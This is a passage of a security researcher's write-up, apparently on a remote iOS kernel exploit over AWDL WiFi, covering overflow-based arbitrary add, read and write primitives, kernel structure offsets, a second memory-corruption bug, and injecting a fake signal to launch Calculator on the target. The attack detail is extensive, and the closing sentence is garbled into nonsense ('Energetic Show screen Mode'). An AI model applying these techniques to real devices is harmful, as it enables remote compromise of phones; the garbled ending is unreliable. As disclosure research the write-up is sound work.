You’re hopefully starting to see why the ACK sniffing model vs the timing model is important now; if the target had only received 31 frames then attempting the arbitrary add would cause a kernel panic.

Recall that at this point however I’m using a 2.4GHz only WiFi adaptor for injection and monitoring and the only data rate I can get to work is 1Mbps. Actually getting 33 frames onto the air within 1024ms, especially as only a fraction of that time will be AWDL Availability Windows, is probably impossible.

Furthermore, as I suddenly need far more accuracy in terms of knowing whether frames were received or not, I start to notice how unreliable my monitor device is. It appears to be regularly dropping frames, with an error rate seemingly positively-correlated with how long the adaptor has been plugged in. After a while my testing model involves having to unplug the injection and monitoring adaptors after each test to let them cool down. This hopefully gives a taste of how frustrating many parts of this exploit development process were. Without a stable and fast testing setup prototyping ideas is painfully slow, and understanding whether an idea didn’t work is made harder because you never know if your idea didn’t work, or if it was yet another hardware failure.

It’s probably impossible to make the timing checks pass using intended behaviour with the current setup. But we still have a few tricks up our sleeve. We do have a memory corruption vulnerability after all.

Looking at the two relevant fields per_second_timestamp and n_frames_in_last_second we notice that they’re at the following offsets:

/* +0x1648 */  struct ether_addr sync_tree_macs[10];
/* +0x1684 */  uint8_t sync_error_count;
/* +0x1685 */  uint8_t had_chanseq_tlv;
/* +0x1686 */  uint8_t pad3[2];
/* +0x1688 */  uint64_t per_second_timestamp;
/* +0x1690 */  uint32_t n_frames_in_last_second;
/* +0x1694 */  uint8_t pad21[4];
/* +0x1698 */  void *steering_msg_blob;
/* +0x16A0 */  uint32_t steering_msg_blob_size;

So the timestamp (which is absolute, not relative) and the frame count are just after the sync tree buffer which we can overflow out of, meaning we can reliably corrupt them and provide a fake timestamp and count.
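To make the distances concrete, here is a small sketch that computes how many bytes an overflow starting at sync_tree_macs has to write to cover each field. The offsets are taken from the listing above; the macro and function names are hypothetical, and the sketch says nothing about the granularity in which the real overflow writes.

```c
#include <assert.h>
#include <stdint.h>

#define SYNC_TREE_MACS_OFF 0x1648u /* struct ether_addr sync_tree_macs[10] */
#define PER_SECOND_TS_OFF  0x1688u /* uint64_t per_second_timestamp */
#define N_FRAMES_OFF       0x1690u /* uint32_t n_frames_in_last_second */

/* Size of the legitimate array: ten 6-byte MAC addresses. */
static uint32_t sync_tree_capacity(void)
{
    return 10u * 6u;
}

/* Bytes that must be written, starting at sync_tree_macs, to fully cover a
 * field at field_off that is field_size bytes long. */
static uint32_t overflow_len_to_cover(uint32_t field_off, uint32_t field_size)
{
    return field_off + field_size - SYNC_TREE_MACS_OFF;
}
```

Under these offsets, 0x48 bytes reach the end of the timestamp and 0x4c bytes reach the end of the frame counter, against a legitimate capacity of 0x3c bytes.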

Arbitrary add idea 1: clock synchronization

My first idea was to try to determine the delta between the target device’s absolute clock and the raspberry pi running the exploit. Then safely triggering an arbitrary add would be a three step process:

1) Compute a valid per_second_timestamp value at a point just in the future and do a short overflow within upper_peer to give it that arbitrary timestamp and a high n_frames_in_last_second value.

2) Do a long overflow from lower_peer to corrupt upper_peer’s peer_manager pointer to point 0x7c80 bytes below the arbitrary add target.

3) Spoof a frame from upper_peer where the length corresponds to the size of the arbitrary add. As long as the timestamp we wrote in step 1 is less than 1024 ms earlier than the target device’s current clock, and the n_frames_in_last_second is still large, we’ll hit the early error return path.

To pull this off we’ll need to synchronize our clocks. AWDL itself is built on accurate timing and there are timing values in every AWDL frame. But they don’t really help us that much because these are relative timestamps whereas we need absolute timestamps.

Luckily we already have a limited read primitive, and in fact we’ve already accidentally used it to leak a timestamp:

The same annotated hexdump from the initial read primitive when it found two neighbouring peers. At offset +0x43 in the dump we can see the per_second_timestamp value. We’d now like to leak one of these which we force to be set at an exact moment in time

We can use the initial limited arbitrary read primitive again under more controlled circumstances to try to determine the clock delta like this:

1) Wait 1024 ms.

2) Spoof a frame from lower_peer, which will cause it to get a fresh per_second_timestamp.

3) When we receive an ACK, record the current timestamp on the raspberry pi.

4) Use the BSS Steering read to read lower_peer’s timestamp.

5) Convert the two timestamps to the same units and compute the delta.
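Step 5 can be sketched as follows. This assumes the leaked value is in mach_absolute_time ticks and that the attacker’s clock is in nanoseconds; the numer/denom timebase is whatever mach_timebase_info() would report on the target (125/3, i.e. a 24 MHz tick, is used below purely as an example value). All function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Convert ticks to nanoseconds with a numer/denom timebase, splitting the
 * multiplication to avoid overflowing 64 bits. */
static uint64_t ticks_to_ns(uint64_t ticks, uint32_t numer, uint32_t denom)
{
    return (ticks / denom) * numer + (ticks % denom) * numer / denom;
}

/* Inverse conversion, nanoseconds back to ticks. */
static uint64_t ns_to_ticks(uint64_t ns, uint32_t numer, uint32_t denom)
{
    return (ns / numer) * denom + (ns % numer) * denom / numer;
}

/* Offset such that target_ns is approximately local_ns + delta. */
static int64_t clock_delta_ns(uint64_t leaked_target_ticks, uint64_t local_ns_at_ack,
                              uint32_t numer, uint32_t denom)
{
    return (int64_t)(ticks_to_ns(leaked_target_ticks, numer, denom) - local_ns_at_ack);
}

/* Predict the target's tick counter at some local time, e.g. to build a
 * per_second_timestamp value that lies just in the future. */
static uint64_t predict_target_ticks(uint64_t local_ns, int64_t delta_ns,
                                     uint32_t numer, uint32_t denom)
{
    return ns_to_ticks(local_ns + (uint64_t)delta_ns, numer, denom);
}
```

Any error in when the ACK was observed feeds directly into the delta, which is the fragility the following paragraphs describe.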

Now we can perform the arbitrary write as described above by using the SyncTree overflow within upper_peer to give it a fake and valid per_second_timestamp and n_frames_in_last_second value. This works, and we can add an arbitrary byte to an arbitrary address!

Unfortunately it’s not very reliable. There are too many things to go wrong here, and for a painful couple of weeks everything went wrong. Firstly, as previously discussed, the injection and monitoring hardware is just too unreliable. If we miss ACKs we end up getting the clock delta wrong, and if the clock delta is too wrong we’ll panic the target. Also, we’re still sending frames very slowly, and the slower this all happens the lower the probability that our fake timestamp remains valid by the time it’s used. We need an approach which is going to work far more reliably.

Having to synchronize the clocks is fragile. Looking more closely at the code, I realized there was another way to reach the error bail out path without manually syncing.

If we wait 1024ms then spoof a frame, the peer structure will get a fresh timestamp which will pass the timestamp check for the next 1024ms.

We can’t do that and then overflow into the n_frames_in_last_second field, because that field is after the per_second_timestamp so we’d corrupt it. But there is actually a way to corrupt the n_frames_in_last_second field without touching the timestamp:

1) Wait 1024ms then spoof a valid frame from upper_peer, giving its IO80211AWDLPeer object a valid per_second_timestamp.

2) Overflow from lower_peer into upper_peer, setting upper_peer’s peer_manager pointer to 0x7c80 bytes before upper_peer’s n_frames_in_last_second counter.

3) Spoof a valid frame from upper_peer.

Let’s look more closely at exactly what will happen now:

It’s now the case that this->peer_manager points 0x7c80 before peer->n_frames_in_last_second when IO80211AWDLPeer::actionFrameReport gets called on upper_peer:

  peer_manager = this->peer_manager;
  frame_len = mbuf_len(frame_mbuf);

Because we’ve corrupted upper_peer’s peer_manager pointer, peer_manager->total_bytes_received overlaps with upper_peer->n_frames_in_last_second, meaning this add will add the frame length to upper_peer->n_frames_in_last_second! The important part is that this write happens before n_frames_in_last_second is checked!

  peer_manager->total_bytes_received += frame_len;
  ++this->n_frames_in_last_second;
  per_second_timestamp = this->per_second_timestamp;
  absolute_time_now = mach_absolute_time();
  frames_in_last_second = this->n_frames_in_last_second;

And if we’re fast enough we’ll still pass this test, because we have a real timestamp:

  if ( ((absolute_time_now - per_second_timestamp) / 1000000)
        > 1024 )// more than 1024ms difference
  {
     …
  }

and now we’ll also pass this test and return:

  else if ( frames_in_last_second >= 0x21 )
  {
    *(_DWORD *)(a2 + 20) = 1;
    return 0;
  }

We now have a timestamp still valid for some portion of 1024ms and n_frames_in_last_second is very large, without having to send that many frames within the 1024ms window or having to manually synchronize the clocks.

The fourth step is then to overflow again from lower_peer to upper_peer, this time pointing peer_manager to 0x7c80 below the desired add target. Finally, spoof a frame from upper_peer, padded to the correct size for the desired add value.
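The self-referential trick in steps 2 and 3 can be simulated against a flat byte array standing in for kernel memory. This is only a sketch under that assumption: fake_kmem, the addresses and the function names are invented for illustration, and only the 0x7c80 offset and the order of the two updates come from the text.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define TOTAL_BYTES_RECEIVED_OFF 0x7c80u /* dword inside peer_manager */

static uint8_t fake_kmem[0x10000];       /* stand-in for kernel memory */

static uint32_t read32(uint64_t addr)
{
    uint32_t v;
    memcpy(&v, &fake_kmem[addr], sizeof(v));
    return v;
}

static void write32(uint64_t addr, uint32_t v)
{
    memcpy(&fake_kmem[addr], &v, sizeof(v));
}

/* Value to place in peer->peer_manager so that the total_bytes_received
 * add lands on target_addr. */
static uint64_t fake_peer_manager_for(uint64_t target_addr)
{
    return target_addr - TOTAL_BYTES_RECEIVED_OFF;
}

/* Models only the two counter updates at the top of actionFrameReport and
 * returns the frame count that the later check would see. */
static uint32_t model_counter_updates(uint64_t peer_manager, uint64_t n_frames_addr,
                                      uint32_t frame_len)
{
    uint64_t total_addr = peer_manager + TOTAL_BYTES_RECEIVED_OFF;
    write32(total_addr, read32(total_addr) + frame_len); /* total_bytes_received += frame_len */
    write32(n_frames_addr, read32(n_frames_addr) + 1);   /* ++n_frames_in_last_second */
    return read32(n_frames_addr);
}
```

Pointing the fake peer_manager at the peer’s own counter means a single 100-byte frame is enough to push the count past 0x21 before it is checked.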

The final timing trick for now was to realize we could skip the initial 1024ms wait by first overflowing within upper_peer to set its timestamp to 0. Then the next valid frame spoofed from upper_peer would be sure to set a valid per_second_timestamp usable for the next 1024 ms. In this way we can use the arbitrary write quite quickly, and start building our next primitive. Except…

Earlier I accidentally found another exploitable zero day. Fortunately it was fairly easy to avoid triggering it, but my exploit continued to panic the target device in a multitude of ways. Of course, as before, I’d sort of expect this and indeed I worked out a few ways in which I was potentially causing panics.

One was that when I was overwriting the peer_manager pointer I was also overwriting the flink and blink pointers of the peer in the linked list of peers. If peers had been added or removed from the list since I had taken the copy of those pointers I could now be corrupting the list, potentially adding back stale pointers or altering the order. This was bound to cause problems so I added a workaround: I’d ensure that no spoofed peers ever got freed. This is easy to implement; just make sure every peer spoofs a frame around every 20 seconds or so and you’ll be fine.

But my test device was still panicking, so I decided to really dig into some of the panics and work out exactly what was happening. Was I accidentally triggering yet another zero-day?

After a day or so of analysis and reversing I realized that yes, this is in fact another exploitable zero-day in AWDL. This is the third, also reachable in the default configuration of iOS.

This vulnerability took significantly more effort to understand than the double free. The condition is more subtle and boils down to a failure to clear a flag. With no upfront knowledge of the names or purposes of these flags (and there are hundreds of flags in AWDL) it required a lot of painstaking reverse engineering to work out what’s going on. Let’s dive in.

resetAndRemovePeerInfo is a member function of the IO80211PeerBssSteeringManager. It’s called when a peer is being destructed:

IO80211PeerBssSteeringManager::resetAndRemovePeerInfo(
  IO80211AWDLPeer *peer) {
  struct BssSteeringCntx *cntx;
  if (!peer) {
    // log error and return
  }
  peer->added_to_fw_cache = 0;
  cntx = this->steering_cntx;
  if (cntx->peer_count) {
    for (uint64_t i = 0; i < cntx->peer_count; i++) {
      if (memcmp(&cntx->peer_macs[i], &peer->peer_mac, 6uLL) == 0) {
        memset(&cntx->peer_macs[i], 0, 6uLL);
      }
    };
  }
  cntx->peer_count--;
}

We can see a callsite here in IO80211AWDLPeerManager::removePeer:

if (peer->added_to_fw_cache) {
  if (this->steering_manager)  {
    this->steering_manager->resetAndRemovePeerInfo(peer);
  }
}

added_to_fw_cache is a name I have given to the flag field at +0x4b8 in IO80211AWDLPeer. We can see that if a peer with that flag set is destructed then the peer manager will call the steering_manager’s resetAndRemovePeerInfo method shown above.

resetAndRemovePeerInfo clears that flag then iterates through the steering context object’s array of currently-being-steered peer MAC addresses. If the MAC address of the peer being destructed is found in there, then it’s memset to 0.

The logic already looks a little odd; they decrement peer_count but don’t shrink the size of the array by swapping the empty slot with the last valid entry, meaning this will only work correctly if the peers are destructed in the exact reverse order that they were added. Kinda weird, but probably not a security vulnerability.

The logic of this function means peer_count will be decremented each time it runs. But what would happen if this function were called more times than the initial value of peer_count? In the first extra invocation the memcmp loop would not execute and peer_count would be decremented from 0 to 0xffffffff, but in the second extra invocation, the peer_count is non-zero, so it would enter the memcmp/memset loop. But the only loop termination condition is i>=peer_count, so this loop will try to run 4 billion times, certainly going off the end of the 8 entry peer_macs array:

struct __attribute__((packed)) BssSteeringCntx {
/* +0x0000 */  uint32_t first_field;
/* +0x0004 */  uint32_t service_type;
/* +0x0008 */  uint32_t peer_count;
/* +0x000C */  uint32_t role;
/* +0x0010 */  struct ether_addr peer_macs[8];
/* +0x0040 */  struct ether_addr infraBSSID;
/* +0x0046 */  uint8_t pad4[6];
/* +0x004C */  uint32_t infra_channel_from_datapath_tlv;
/* +0x0050 */  uint8_t pad8[8];
/* +0x0058 */  char ssid[32];
/* +0x0078 */  uint8_t pad1[12];
/* +0x0084 */  uint32_t num_peers_added_to_umi;
/* +0x0088 */  uint8_t pad_10;
/* +0x0089 */  uint8_t pendingTransitionToNewState;
/* +0x008A */  uint8_t pad7[2];
/* +0x008C */  enum BSSSteeringState current_state;
/* +0x0090 */  uint8_t pad5[8];
/* +0x0098 */  struct IOTimerEventSource *bssSteeringExpiryTimer;
/* +0x00A0 */  struct IOTimerEventSource *bssSteeringStageExpiryTimer;
/* +0x00A8 */  uint8_t pad9[8];
/* +0x00B0 */  uint32_t steering_policy;
/* +0x00B4 */  uint8_t inProgress;
}

My reverse engineered version of the BSS Steering context object. I’ve managed to name most of the fields.

This is only a vulnerability if it’s possible to call this function peer_count+2 times. (To decrement peer_count down to 0, then set it to -1, then re-enter with peer_count=-1.)
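The counter behaviour can be reproduced in isolation. The sketch below models only peer_count and the loop bound the function would use on each call; the MAC array and everything else are left out, and the struct and function names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Only the counter is modelled; last_loop_bound records how many
 * iterations the memcmp/memset loop would attempt on the latest call. */
struct steering_counter_model {
    uint32_t peer_count;
    uint64_t last_loop_bound;
};

static void model_reset_and_remove(struct steering_counter_model *c)
{
    c->last_loop_bound = c->peer_count; /* for (i = 0; i < peer_count; i++) */
    c->peer_count--;                    /* unconditional, wraps below zero */
}
```

Starting from peer_count = 1, the third call (peer_count+2) sees a loop bound of 0xffffffff against an array of 8 entries.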

Whether or not resetAndRemovePeerInfo is called when a peer is destructed depends only on whether that peer has the added_to_fw_cache flag set; this gives us an inequality: the number of peers with added_to_fw_cache set must be less than or equal to peer_count+1. Probably it’s really meant to be the case that peer_count should be equal to the number of peers with that flag set. Is that the case?

No, it’s not. After steering fails we restart the BSS Steering state machine by sending a new BSSSteering TLV with a steeringMsgID of 6 rather than 0; this means the steering state machine gets a BSS_STEERING_REMOTE_STEERING_TRIGGER event rather than the BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD which was used to start it. This resets the steering context object, filling the peer_macs array with whatever new peer MACs we specify in the new DIRECTED_STEERING_CMD TLV. If we specify different peers to those already in the context’s peer_macs array, then those old entries’ corresponding IO80211AWDLPeer objects don’t have their added_to_fw_cache field cleared, but the new peers do get that flag set.

This means that the number of peers with the flag set becomes greater than context->peer_count, so as the peers eventually get destructed peer_count goes down to zero, underflows, then causes memory corruption.

I was hitting this condition each time I restarted steering, though it would take a while for the device to actually kernel panic because the steered peers needed to time out and get destructed.

Root causing this second bonus remotely-triggerable iOS kernel memory corruption was much harder than the first bonus double-free; the explanation given above took a few days’ work. It was necessary though as I had to work around both of these vulnerabilities to ensure I didn’t accidentally trigger them, which in total added a significant amount of extra work.

The work-around in this case was to ensure that I only ever restarted steering the same peers; with that change we no longer hit the peer_count underflow and only corrupt the memory we’re trying to corrupt! This issue was fixed in iOS 13.6 as CVE-2020-9906.

The target is no longer randomly kernel panicking even when we don’t trigger the intended Sync Tree heap overflow, so let’s get back to the exploit.

We have an arbitrary add primitive but it’s not quite an arbitrary write yet. For that, we need to know the original values so we can compute the correct per-byte frame sizes to overflow each byte to write a truly arbitrary value.
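One way to turn a dword add into byte writes, once the current bytes are known, is sketched below. It is an illustration of the arithmetic only, not the exploit’s wk8: the frame length bounds are hypothetical, memory is a local byte array treated as little-endian, and the current bytes are read straight from that array where the real exploit would need a read primitive.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical lower bound on a spoofable frame length. Because any length
 * with the right low byte works, a 0x100-wide range is always sufficient. */
#define MIN_FRAME_LEN 0x100u

/* Model of the primitive: a 32-bit little-endian add at an arbitrary offset. */
static void add32_le(uint8_t *mem, size_t off, uint32_t val)
{
    uint32_t v = (uint32_t)mem[off] | ((uint32_t)mem[off + 1] << 8) |
                 ((uint32_t)mem[off + 2] << 16) | ((uint32_t)mem[off + 3] << 24);
    v += val;
    mem[off]     = (uint8_t)v;
    mem[off + 1] = (uint8_t)(v >> 8);
    mem[off + 2] = (uint8_t)(v >> 16);
    mem[off + 3] = (uint8_t)(v >> 24);
}

/* Frame length whose low byte turns `current` into `desired` when added. */
static uint32_t frame_len_for_byte(uint8_t current, uint8_t desired)
{
    uint32_t len = (uint8_t)(desired - current);
    while (len < MIN_FRAME_LEN)
        len += 0x100;       /* same low byte, longer frame */
    return len;
}

/* Write n bytes from low to high address. Each add also disturbs the three
 * bytes above it, so later iterations re-read the current value and the up
 * to three bytes past the end are clobbered. */
static void write_bytes_via_add(uint8_t *mem, size_t off, const uint8_t *desired, size_t n)
{
    for (size_t i = 0; i < n; i++)
        add32_le(mem, off + i, frame_len_for_byte(mem[off + i], desired[i]));
}
```

The low-to-high ordering matters: carries and the high bits of each frame length spill upwards, and the following iteration corrects them.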

Probably we’ll have to use the arbitrary add to corrupt something in a peer or the peer manager such that we can get it to use an arbitrary pointer when building an MI or PSF frame which will be sent over the air.

I went back to IDA and spent a very long time looking through code to find such a primitive, and found one in the construction of the Service Request Descriptor TLVs in MI frames:

IO80211AWDLPeerManager::buildMasterIndicationTemplate
  (char *buffer, u32 total_size …
  req_desc = this->req_desc;
  if ( req_desc ){
    desc_len = req_desc->desc_len;        // length
    desc_ptr = req_desc->desc_ptr;
    tlv_len = desc_len+4;
    if (desc_len && desc_ptr && tlv_len
      buffer[offset] = 16; // type
      *(u16*)&buffer[offset+1] = desc_len + 1; // len
      buffer[current_buffer_offset+3] = 3;
      IO80211ServiceRequestDescriptor::copyDataOnly(
        req_desc,
        &buffer[offset+4],
        total_size - offset - 4);
    }

This is reading an IO80211ServiceRequestDescriptor object pointer from the peer manager from which it reads another pointer and a length. If there’s space in the MI frame for that length of buffer then it calls the RequestDescriptor‘s copyDataOnly method, which simply copies from the RequestDescriptor into the MI frame template. It’s only reading these two pointer and length fields which are at offset +0x40 and +0x54 in the request descriptor, so by pointing the IO80211AWDLPeerManager‘s req_desc pointer to data we control we can cause the next MI template which is generated to contain data read from an arbitrary address, this time with no restrictions on the data being read.

We can use the limited read primitive we currently have to read the existing value of the req_desc pointer, we just need to find somewhere below it in the peer_manager object where we know there will always be a fixed, small dword we can use as the length value needed for the read. Indeed, a few bytes below this there is such a value.

The first trick is in choosing somewhere to point the req_desc pointer to. We want to choose somewhere where we can easily update the read target without having to trigger the memory corruption. From reading the TLV parsing code I knew there were some TLVs which have very little processing. A good example, and the one I chose to use, is the NSync TLV. The only processing is to check that the total TLV length including the header is less than or equal to 0x40. That entire TLV is then memcpy‘ed into a 0x40 byte buffer in the peer object at offset +0x4c4:

memcpy(this->nsync_tlv_buf, tlv_ptr, tlv_total_len);

We can use the arbitrary write to point the peer_manager’s req_desc pointer to just below the lower_peer’s nsync_tlv buffer such that by spoofing NSync TLVs from lower_peer we can update the fake descriptor pointer and length values.

Some care needs to be taken when corrupting the req_desc pointer however, as we can currently only do byte-by-byte writes and the req_desc pointer might be read while we are corrupting it. We therefore need a way to stop these reads.

IO80211AWDLPeerManager::updateBroadcastMI is on the critical path for the read, meaning that each time the MI frame is updated it must go through this function, which contains the following check:

if (this->frames_outstanding < this->frames_limit) {
  IO80211AWDLPeerManager::updatePrimaryPayloadMI(…

frames_limit is initialized to a fixed value of three. If we first use the arbitrary add to make frames_outstanding very large, this check will fail and the MI template won’t be updated, and the req_desc member won’t be read. Then after we’re done corrupting the req_desc pointer we can set this value back to its original value and the MI templates will be updated again and the arbitrary read will work.

One easy way to do this is to add 0x80 to the most-significant byte of frames_outstanding. The first time we do this it will make frames_outstanding very large. If it were 2 to begin with it would go from: 0x00000002 to 0x80000002.

Adding 0x80 to that MSB a second time would cause it to then overflow back to 0, resetting the value to 2 again. This of course has the side effect of adding 1 to the next dword field in the peer_manager when it overflows, but fortunately this doesn’t cause any problems.
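The toggle is easy to check on paper or in a few lines of C. The sketch below treats eight bytes as frames_outstanding followed by the next dword, little-endian, and applies the modelled dword add at byte offset +3; the helper names and the neighbouring field’s value are invented for the example.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static uint32_t load32_le(const uint8_t *mem, size_t off)
{
    return (uint32_t)mem[off] | ((uint32_t)mem[off + 1] << 8) |
           ((uint32_t)mem[off + 2] << 16) | ((uint32_t)mem[off + 3] << 24);
}

/* Model of the primitive: a 32-bit little-endian add at an arbitrary offset. */
static void add32_le(uint8_t *mem, size_t off, uint32_t val)
{
    uint32_t v = load32_le(mem, off) + val;
    mem[off]     = (uint8_t)v;
    mem[off + 1] = (uint8_t)(v >> 8);
    mem[off + 2] = (uint8_t)(v >> 16);
    mem[off + 3] = (uint8_t)(v >> 24);
}

/* Add 0x80 to the most significant byte of the dword at field_off. The add
 * is itself dword-sized, so it spans into the following field. */
static void toggle_msb(uint8_t *mem, size_t field_off)
{
    add32_le(mem, field_off + 3, 0x80);
}
```

The first toggle blocks MI template updates; the second restores the original count and bumps the neighbouring dword by one.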

Now by spoofing an NSync TLV from lower_peer and monitoring for a change in the contents of the 0x10 TLV sent by the target in MI frames we can read arbitrary kernel data from arbitrary addresses.

We now have a truly arbitrary read, but unfortunately it can be a bit slow. Sometimes it takes a few seconds for the MI template to be updated. What we need is a way to force the MI template to be regenerated on demand.

Looking through the cross references to IO80211AWDLPeerManager::updateBroadcastMI I noticed that the MI template seems to get regenerated each time the peer bloom filter gets updated in IO80211AWDLPeerManager::updatePeerListBloomFilter. As we saw much earlier in this post, and I had determined months before this point, the bloom filter code is never used. But… we have an arbitrary add so we could just turn it on!

Indeed, by flipping the flag at +0x5950 in the IO80211AWDLPeerManager we can enable the peer bloom filter code.

With peer bloom filters enabled, each time the target sees a new peer it regenerates the MI template in order to ensure it’s broadcasting an up-to-date bloom filter containing all the peers it knows about (or at least the first 256 in the peer list.) This means we can make our arbitrary read much, much faster: we just need to send the correct NSync TLV containing our read target then spoof a new peer and wait for an updated MI. With this technique complete we can read arbitrary remote kernel memory over the air at a rate of many kilobytes per second.

At this point we can build the typical abstraction layer used by a local privilege escalation exploit, except this time it’s remote.

The main kernel memory read function is:

void *rkbuf(uint64_t kaddr, uint32_t len);

With some helpers to make the code simpler:

uint64_t rk64(uint64_t kaddr);
uint32_t rk32(uint64_t kaddr);
uint8_t rk8(uint64_t kaddr);

Similarly for writing kernel memory, we have the main write method:

void wk8(uint64_t kaddr, uint8_t desired_byte);

and some helpers:

void wkbuf(uint64_t kaddr, uint8_t *desired_value, uint32_t len);
void wk64(uint64_t kaddr, uint64_t desired_value);
void wk32(uint64_t kaddr, uint32_t desired_value);
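As an illustration of how such helpers layer on top of the two primitives, here is a sketch in which rkbuf and wk8 are backed by a local byte array instead of the radio. The backing store, the malloc-based ownership convention for rkbuf and the little-endian byte order are assumptions; only the function names and signatures are taken from the list above.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

static uint8_t fake_kmem[256];  /* stand-in for remote kernel memory */

/* Primitive read: assumed here to return a malloc'd copy the caller frees. */
static void *rkbuf(uint64_t kaddr, uint32_t len)
{
    void *buf = malloc(len);
    if (buf)
        memcpy(buf, &fake_kmem[kaddr], len);
    return buf;
}

/* Primitive write: one byte at a time, as with the add-based write. */
static void wk8(uint64_t kaddr, uint8_t desired_byte)
{
    fake_kmem[kaddr] = desired_byte;
}

/* Helper: assemble a little-endian 64-bit value from a buffer read. */
static uint64_t rk64(uint64_t kaddr)
{
    uint64_t v = 0;
    uint8_t *buf = (uint8_t *)rkbuf(kaddr, 8);
    if (!buf)
        return 0;
    for (int i = 0; i < 8; i++)
        v |= (uint64_t)buf[i] << (8 * i);
    free(buf);
    return v;
}

/* Helper: a buffer write is a loop over the byte primitive. */
static void wkbuf(uint64_t kaddr, uint8_t *desired_value, uint32_t len)
{
    for (uint32_t i = 0; i < len; i++)
        wk8(kaddr + i, desired_value[i]);
}

/* Helper: split a 64-bit value into little-endian bytes. */
static void wk64(uint64_t kaddr, uint64_t desired_value)
{
    uint8_t bytes[8];
    for (int i = 0; i < 8; i++)
        bytes[i] = (uint8_t)(desired_value >> (8 * i));
    wkbuf(kaddr, bytes, 8);
}
```

Everything above the two primitives is ordinary code, which is why the rest of the exploit can be written as if it were local.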

From this point the exploit code begins to look much more like a regular local privilege escalation exploit and the remote aspect is almost completely abstracted away.

This is already enough to pop calc. To do that we just need a way to inject a control flow edge into userspace somehow. A bit of grepping through the XNU code and I stumbled across the code handling BSD signal delivery, which seemed promising.

Each process structure has an array of signal handlers; one per signal number.

struct sigacts {
  user_addr_t ps_sigact[NSIG];   /* disposition of signals */
  user_addr_t ps_trampact[NSIG]; /* disposition of signals */
  …

The ps_trampact array contains userspace function pointers. When the kernel wants a userspace process to handle a signal it looks up the signal number in that array:

  trampact = ps->ps_trampact[sig];

then sets the userspace thread’s pc value to that:

  sendsig_set_thread_state64(
    &ts.ts64.ss,
    catcher,
    infostyle,
    sig,
    (user64_addr_t)&((struct user_sigframe64*)sp)->sinfo,
    (user64_addr_t)p_uctx,
    token,
    trampact,
    sp,
    th_act)

Where sendsig_set_thread_state64 looks like this:

static kern_return_t
sendsig_set_thread_state64(arm_thread_state64_t *regs,
                           user64_addr_t catcher,
                           int infostyle,
                           int sig,
                           user64_addr_t p_sinfo,
                           user64_addr_t p_uctx,
                           user64_addr_t token,
                           user64_addr_t trampact,
                           user64_addr_t sp,
                           thread_t th_act) {
  regs->x[0] = catcher;
  regs->x[1] = infostyle;
  regs->x[2] = sig;
  regs->x[3] = p_sinfo;
  regs->x[4] = p_uctx;
  regs->x[5] = token;
  regs->pc = trampact;
  regs->cpsr = PSR64_USER64_DEFAULT;
  regs->sp = sp;
  return thread_setstatus(th_act,
                          ARM_THREAD_STATE64,
                          (void *)regs,
                          ARM_THREAD_STATE64_COUNT);
}

The catcher value in X0 is also completely controlled, read from the ps_sigact array.

Note that the kernel APIs for setting userspace register values don’t require userspace pointer authentication codes.

We can set X0 to the constant CFString “com.apple.calculator” already present in the dyld_shared_cache. On 13.3 on the 11 Pro this is at 0x1BF452778 in an unslid shared cache.

We set PC to this gadget in CommunicationSetupUI.framework:

MOV  W1, #0
BL   _SBSLaunchApplicationWithIdentifier

This clears W1 then calls SBSLaunchApplicationWithIdentifier, a Springboard Services Framework private API for launching apps.

The final piece of this puzzle is finding a process to inject the fake signal into. It needs to have the com.apple.springboard.launchapplications entitlement in order for Springboard to process the launch request. Using Jonathan Levin’s entitlement database it’s easy to find the list of injection candidates.

We remotely traverse the linked list of running processes looking for a victim, set a fake signal handler, then make a thread in that process believe it has to handle a signal by OR’ing in the correct signal number in the uthread’s siglist bitmap of pending signals:

wk8(uthread+0x10c+3, 0x40); // uthread->siglist

and finally making the thread believe it needs to handle a BSD AST:

wk8_no_retry(thread+0x2e8, 0x80); // thread->ast |= AST_BSD
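The constants in the siglist write can be decoded with a little arithmetic. The sketch below assumes the usual BSD convention that signal n occupies bit n-1 of a 32-bit little-endian bitmap; under that assumption, byte +3 with value 0x40 is bit 30, i.e. signal 31. That reading is my inference from the constants rather than something the text states, and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Byte within a little-endian 32-bit pending-signal bitmap that holds the
 * bit for signum, assuming signal n maps to bit n-1. */
static uint32_t siglist_byte_index(int signum)
{
    return (uint32_t)(signum - 1) / 8;
}

/* Value of that byte with only the bit for signum set. */
static uint8_t siglist_byte_value(int signum)
{
    return (uint8_t)(1u << ((signum - 1) % 8));
}

/* Full 32-bit mask, for comparison with the byte-wise view. */
static uint32_t sigmask_bit(int signum)
{
    return 1u << (signum - 1);
}
```

A byte-sized write is enough here because only a single bit in a single byte needs to be set.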

Now, when this thread gets scheduled and tries to handle pending ASTs, it will try to handle our fake signal and a calculator will appear:

An iPhone 11 Pro running Calculator.app with a monitor in the background showing the output from the final stage of the AWDL exploit

We’ve popped calc, we’re done! Or are we? It’s kinda slow, and there’s no real reason for it to be so slow. We managed to build quite a fast arbitrary read primitive so that’s not the bottleneck. The main bottleneck at the moment is the initial BSS Steering-based read. It’s taking 8 seconds per read because it needs the state machine to time out between each attempt.

As we saw, however, the BSS Steering TLV indicates that we should be able to steer up to 8 peers at the same time, meaning that we should be able to improve our read speed by at least 8x. In fact, if we can get away with 8 or fewer initial reads our read speed might be much faster than that.

However, when you try to steer 8 peers simultaneously, it doesn’t quite work as expected:

When multiple peers are steered the UMIs flood the airwaves. In this example I was steering 8 peers but the frames are dominated by UMIs to the first peer. You can see a handful of UMIs to :06, and one to :02 among the dozens to :00.

Testing against MacOS we also see the following log message:

Peer 22:22:aa:22:00:00 DID NOT ack our UMI

When the target tries to steer 8 peers at the same time it starts flooding the airwaves with UMI frames directed at the target peers; so many in fact that it never actually manages to send the UMIs for all 8 steering targets before timing out.

We’ve already covered how to stall the initial sending of UMIs by controlling the channel sequence, but it looks like we’re also going to have to ACK the UMI frames.

As we saw earlier, ACKs in 802.11a and g are timing based. To ACK a frame you need to send the ACK in the short window following the transmission of the frame. We certainly can’t do that using libpcap; the timing needs microsecond precision. We probably can’t even do that with a custom kernel driver.

There could be on the opposite hand an obscure WiFi adaptor video display mode feature called “Energetic Show screen Mode”, supported by only a few chipsets.

